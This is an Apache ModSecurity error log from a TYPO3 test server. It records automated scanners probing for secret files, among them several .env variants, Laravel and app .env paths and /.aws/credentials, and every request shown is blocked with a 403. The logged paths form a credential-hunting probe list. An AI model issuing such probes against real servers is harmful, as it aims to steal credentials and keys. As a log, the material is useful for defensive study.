[Mon Jun 09 20:16:18.455088 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEck8p3hwxzzahSGXRvc2AAAAAc"]
[Mon Jun 09 20:16:18.675203 2025] [authz_core:error] [pid 3743366] [client 185.177.72.106:4448] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Jun 09 20:16:18.816755 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEck8p3hwxzzahSGXRvc4gAAAAc"]
[Mon Jun 09 20:16:18.816984 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEck8p3hwxzzahSGXRvc4gAAAAc"]
[Mon Jun 09 20:16:18.817133 2025] [:error] [pid 3743366] [client 185.177.72.106:4448] [client 185.177.72.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEck8p3hwxzzahSGXRvc4gAAAAc"]
[Wed Jun 11 07:26:25.951141 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEkTgScfKKDn8abiVEFx_wAAAAg"]
[Wed Jun 11 07:26:25.952400 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEkTgScfKKDn8abiVEFx_wAAAAg"]
[Wed Jun 11 07:26:25.952603 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEkTgScfKKDn8abiVEFx_wAAAAg"]
[Wed Jun 11 07:26:26.574880 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEkTgicfKKDn8abiVEFyAQAAAAg"]
[Wed Jun 11 07:26:26.575124 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEkTgicfKKDn8abiVEFyAQAAAAg"]
[Wed Jun 11 07:26:26.575317 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEkTgicfKKDn8abiVEFyAQAAAAg"]
[Wed Jun 11 07:26:26.909314 2025] [authz_core:error] [pid 3780772] [client 185.177.72.144:45198] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Wed Jun 11 07:26:27.154757 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEkTgycfKKDn8abiVEFyAwAAAAg"]
[Wed Jun 11 07:26:27.154993 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEkTgycfKKDn8abiVEFyAwAAAAg"]
[Wed Jun 11 07:26:27.155201 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEkTgycfKKDn8abiVEFyAwAAAAg"]
[Wed Jun 11 07:26:27.358448 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEkTgycfKKDn8abiVEFyBAAAAAg"]
[Wed Jun 11 07:26:27.358682 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEkTgycfKKDn8abiVEFyBAAAAAg"]
[Wed Jun 11 07:26:27.358887 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEkTgycfKKDn8abiVEFyBAAAAAg"]
[Wed Jun 11 07:26:27.516048 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEkTgycfKKDn8abiVEFyBQAAAAg"]
[Wed Jun 11 07:26:27.516208 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEkTgycfKKDn8abiVEFyBQAAAAg"]
[Wed Jun 11 07:26:27.516433 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEkTgycfKKDn8abiVEFyBQAAAAg"]
[Wed Jun 11 07:26:27.516620 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEkTgycfKKDn8abiVEFyBQAAAAg"]
[Wed Jun 11 07:26:27.540148 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEkTgycfKKDn8abiVEFyBgAAAAg"]
[Wed Jun 11 07:26:27.540370 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEkTgycfKKDn8abiVEFyBgAAAAg"]
[Wed Jun 11 07:26:27.540553 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEkTgycfKKDn8abiVEFyBgAAAAg"]
[Wed Jun 11 07:26:27.746653 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEkTgycfKKDn8abiVEFyCQAAAAg"]
[Wed Jun 11 07:26:27.746885 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEkTgycfKKDn8abiVEFyCQAAAAg"]
[Wed Jun 11 07:26:27.747060 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEkTgycfKKDn8abiVEFyCQAAAAg"]
[Wed Jun 11 07:26:28.271312 2025] [authz_core:error] [pid 3780772] [client 185.177.72.144:45198] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Jun 11 07:26:28.838769 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEkThCcfKKDn8abiVEFyEwAAAAg"]
[Wed Jun 11 07:26:28.839007 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEkThCcfKKDn8abiVEFyEwAAAAg"]
[Wed Jun 11 07:26:28.839187 2025] [:error] [pid 3780772] [client 185.177.72.144:45198] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEkThCcfKKDn8abiVEFyEwAAAAg"]
[Fri Jun 13 09:18:32.020833 2025] [:error] [pid 3821259] [client 83.217.210.41:56312] [client 83.217.210.41] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEvQyB0l4nu5gPY0IWY78AAAAAk"]
[Fri Jun 13 09:18:32.021719 2025] [:error] [pid 3821259] [client 83.217.210.41:56312] [client 83.217.210.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEvQyB0l4nu5gPY0IWY78AAAAAk"]
[Fri Jun 13 09:18:32.021890 2025] [:error] [pid 3821259] [client 83.217.210.41:56312] [client 83.217.210.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEvQyB0l4nu5gPY0IWY78AAAAAk"]
[Fri Jun 13 09:27:50.053433 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEvS9gXwH85pB-AP3sYPywAAAAg"]
[Fri Jun 13 09:27:50.053807 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEvS9gXwH85pB-AP3sYPywAAAAg"]
[Fri Jun 13 09:27:50.054055 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aEvS9gXwH85pB-AP3sYPywAAAAg"]
[Fri Jun 13 09:27:50.208693 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEvS9gXwH85pB-AP3sYPzQAAAAg"]
[Fri Jun 13 09:27:50.208958 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEvS9gXwH85pB-AP3sYPzQAAAAg"]
[Fri Jun 13 09:27:50.209149 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEvS9gXwH85pB-AP3sYPzQAAAAg"]
[Fri Jun 13 09:27:50.273506 2025] [authz_core:error] [pid 3821258] [client 185.177.72.210:49658] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Jun 13 09:27:50.381423 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEvS9gXwH85pB-AP3sYPzwAAAAg"]
